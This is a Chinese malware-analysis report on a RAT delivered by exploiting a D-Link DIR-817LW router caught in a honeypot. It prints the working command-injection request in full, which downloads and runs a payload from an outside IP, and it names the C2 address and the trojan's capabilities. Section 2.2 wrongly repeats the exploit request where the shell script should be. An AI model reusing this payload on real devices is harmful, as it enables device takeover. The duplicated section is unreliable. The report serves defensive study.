一、背景概述

2022年7月20日,天穹威胁监测系统监测到IoT蜜罐系统中的D-Link Dir 817LW路由器遭受来自澳大利亚IP的攻击。系统显示目标设备被攻击成功,并且下载了恶意样本。实验室相关人员第一时间对该攻击事件样本进行分析,发现该次攻击投递的恶意样本为具备RAT功能的恶意程序。

二、关键线索

2.1 攻击特征

我们从天穹威胁监测系统提取了漏洞攻击请求原文,如下所示。根据Payload特征,发现此漏洞是Nday,暂无漏洞编号。

POST /hedwig.cgi HTTP/1.0 Host: 158.*.*.8:8011 Connection: close Content-Length: 515 User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate Accept: */* Content-Type: text/xml Cookie: uid=5r3JP1jSru <postxml> <module> <service>DEVICE.TIME</service> <device> <time> <ntp> <enable>1</enable> <period>604800</period> <server>0.pool.ntp.org ; (wget -O /tmp/x http://149.28.174.108/dL.html ; chmod 777 /tmp/x ; /tmp/x) &amp; exit; </server> </ntp> <ntp6> <enable>1</enable> <period>604800</period> </ntp6> <timezone>57</timezone> <time/> <date/> <dst>0</dst> <dstmanual/> <dstoffset/> </time> </device> </module> </postxml>

2.2 Shell脚本内容

上述攻击请求会控制失陷设备下载地址为http://149.28.174.108/dL.html的文件并执行,文件内容如下所示。

POST /hedwig.cgi HTTP/1.0 Host: 158.*.*.8:8011 Connection: close Content-Length: 515 User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate Accept: */* Content-Type: text/xml Cookie: uid=5r3JP1jSru <postxml> <module> <service>DEVICE.TIME</service> <device> <time> <ntp> <enable>1</enable> <period>604800</period> <server>0.pool.ntp.org ; (wget -O /tmp/x http://149.28.174.108/dL.html ; chmod 777 /tmp/x ; /tmp/x) &amp; exit; </server> </ntp> <ntp6> <enable>1</enable> <period>604800</period> </ntp6> <timezone>57</timezone> <time/> <date/> <dst>0</dst> <dstmanual/> <dstoffset/> </time> </device> </module> </postxml>

根据文件内容,该脚本为一段Shell脚本,功能为远程下载二进制木马文件并执行。我们从真实下载地址http://149.28.174.108:80/dal下载了样本得到dal文件。

三、样本分析

3.1 动态养殖

构建内网隔离环境后,我们对样本进行了养殖与监控。通过监控,我们发现样本在运行时,首先会检测传入的参数,如果无参数或者参数数量不对,则直接退出。这是一种与沙箱对抗的简单方法,可以阻止部分沙箱对样本进行养殖与监控。

3.1.1 文件行为

当我们使用Shell中的启动参数(dal 60 45.149.156.71 9701)运行样本时,进程会删除程序源文件,同时建立两个进程名为sh的子进程

pi 1074 1 0 10:50 ? 00:00:00 sh pi 1075 1074 0 10:50 ? 00:00:00 sh pi 1084 905 0 10:50 pts/0 00:00:00 ps -e

3.1.2 网络行为

进一步分析网络通联情况,发现该程序会监听9725端口。

pi@raspberrypi:/tmp $ netstat -an Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:9725 0.0.0.0:* LISTEN tcp 0 224 192.168.6.188:22 192.168.4.148:26563 ESTABLISHED tcp6 0 0 :::22 :::* LISTEN udp 0 0 0.0.0.0:56975 0.0.0.0:* udp 0 0 0.0.0.0:5353 0.0.0.0:* udp 0 0 0.0.0.0:68 0.0.0.0:* udp6 0 0 :::5353 :::* udp6 0 0 :::51194 :::* raw6 0 0 :::58 :::* 7

此外,通过流量监测发现该样本会定期与IP 45.149.156.71的9701端口建立通讯,心跳周期为60秒,所发送数据包内容为空。

结合该样本上述行为,我们可以判断该样本启动时三个参数的对应关系如下。

样本名    回连间隔       C2 IP         C2端口​

dal         60     45.149.156.71      9701

3.2 静态分析

3.2.1 自删除

运行后,先获取程序绝对路径并删除自身。

3.2.2 创建子进程1并放行端口

将子进程设置为守护进程。

子进程1会监听9725端口。

由于部分IoT设备存在防火墙,会拦截攻击者发送数据,该程序会调用Iptables放行9725端口,确保设备存在防火墙情况下也能与程序正常通讯。

3.2.3 创建子进程2并回连C2

子进程2:主动发起请求回连C2

3.2.4 指令操作

当攻击者与这两个进程中的任何一个建立通信后,就会去调用sub_15A8C 函数去处理接收的攻击者指令,根据接收到的不同命令实现不同的功能。

3.2.4.1 远程文件读取

Case 1 包括接收命令,打开文件和读取文件,发送数据。

3.2.4.2 远程文件写入

Case 2 会接收命令,调用的函数和 Case 1 中的一样,然后是打开文件和写入文件。

3.2.4.3 伪终端功能

Case 3 包括接收命令,接收命令调用的函数和之前一样,然后是打开设备文件,读取并发送。我们根据此函数打开设备文件位置判断这是打开伪终端。

物联网威胁监测系统最新发现一款针对IoT设备的RAT远控木马相关推荐

  1. 基于SpringBoot开发的物联网风电监测系统源码【源码分享】

    SpringBoot物联网风电监测系统源码   iot物联网风电能源电场监控系统源码  源码免费分享,需要源码学习,请先关注然后私信我获取下载地址. 基于SpringBoot的物联网系统 易读易懂.界 ...

  2. 网络安全系列-五十一:网络流量威胁监测系统的方案选择

    本文内容根据深度:如何构建基于威胁情报的高效网络威胁监测架构整理产生,详细内容请参见原文 1. 网络流量威胁监测系统的方案选择 通过网络层面基于网络流量开展基于情报的威胁监测是建设本地威胁情报中心的核 ...

  3. 安卓源代码_中科信安发现一款针对安卓的恶意软件已被开源,专门针对手机银行...

    中科信安得知有一款恶意软件叫做Cerberus银行木马,本来打算拍卖十万美元,但是拍卖失败了,之后这款木马的源代码便在地下黑客论坛上以免费恶意软件的形式进行分享. 卡巴斯基网络安全研究员德米特里·加洛 ...

  4. 一款远控木马分析,仅供学习思路用途

    最近一段时间在面试病毒相关岗位,有的公司会电话.远程面试询问相关知识,有的则会直接发送病毒样本要求分析,写出分析报告.下面要分析的就是面试过程中的某个样本,整理成文,发表出来,供大家参考学习,一起进步 ...

  5. 安全研究人员发现:Nanocore等多个远控木马滥用公有云服务传播

    前言 攻击者越来越多的采用云来构建自己的基础设施,这样不仅能够使攻击者以最少的时间或金钱部署攻击基础设施,也能让追踪攻击行动变得更困难. 从 2021 年 10 月 26 日开始,研究人员发现多个远控 ...

  6. 系统试运行报告_分享:水污染源在线监测系统最新验收条件及内容

    2019年12月24日,国家发布了<水污染源在线监测系统(CODCr.NH3-N 等)验收技术规范>(HJ 354-2019代替 HJ/T 354-2007),并于2020年3月24日实施 ...

  7. 关于一款远控木马的简单分析

    其实很多朋友都不明白木马是如何简简单单的窃取了你的帐号密码乃至你的网银帐号,趁其你使用网银U盾还没有拔下来,直接操纵你的计算机进行转账,或者更高级的在你转账之时修改网页内容,甚至在你不知不觉中开启你计 ...

  8. 基于max30102的物联网病房监测系统(中断处理和主题逻辑)

    目录 五.中断处理 六.主体框架 对采集数据的初始化 核心功能的实现 烟雾 通信帧格式 wifi接收数据的处理 OLED显示 五.中断处理 void SysTick_Handler(void) {Ti ...

  9. 基于STM32F103和物联网平台的滚动轴承在线监测系统

    摘要: 设计了一种基于云平台的滚动轴承在线监测系统,信号采集模块将振动传感器输出的振动信号进行变换,再通过 有源滤波模块处理后交给控制器,控制器内部进行 A / D 采样,随后处理器对 A / D 采 ...

最新文章

  1. 【原创】数据库中时间字段的值读取到DataSet中后,毫秒部分丢失。
  2. UI 设计:如何做到理性?
  3. 台安变频器n2按键说明_力扣 925. 长按键入
  4. Python字符串介绍
  5. ON DUPLICATE KEY UPDATE 附带更新条件
  6. for循环延时_前端中的事件循环eventloop机制
  7. Python中*args和**kwargs的解释
  8. linux Apache启动提示 httpd: apr_sockaddr_info_get() failed f
  9. 序列化和反序列化的几种方式(JavaScriptSerializer 、XmlSerializer、DataContractSerializer)(一)...
  10. Android 打开URL
  11. XRD测试常见问题及解答(三)
  12. 电脑键盘部分按键失灵_键盘按键失灵别担心 电脑达人教你几步解决方法
  13. Beta冲刺第二周王者荣耀交流协会第三次会议
  14. 抖店与淘宝有什么不同?
  15. 程序员体验AI换脸就不要用ZAO了,详解Github周冠军项目Faceswap的变脸攻略
  16. java B2B2C源码电子商务平台 -SpringCloud服务相互调用RestTemplate
  17. 【技术推荐】正向角度看Go逆向
  18. 【Android】第三方QQ账号登录的实现
  19. 失落城堡获取服务器信息,《失落城堡》充值及炸服问题说明
  20. 如何在Eclipse中显示空格(space)和制表符(tab)

热门文章

  1. Unity(如何把方形图片整成圆形)
  2. 51单片机驱动P10单元板
  3. OpenCV目标追踪
  4. 移植u-boot到S3C2440之从内存启动
  5. 如何在wince下添加和删除驱动(作者:wogoyixikexie@gliet)
  6. 报告|中国智能音箱已入局全球市场,双重商业模式迅速扩张
  7. 列中的空值违反了非空约束_管理社区中违反准则的情况
  8. Unity 网络请求
  9. 浅析瞬态抑制二极管双向tvs管
  10. 网站建设视频教程,史上最精,最全。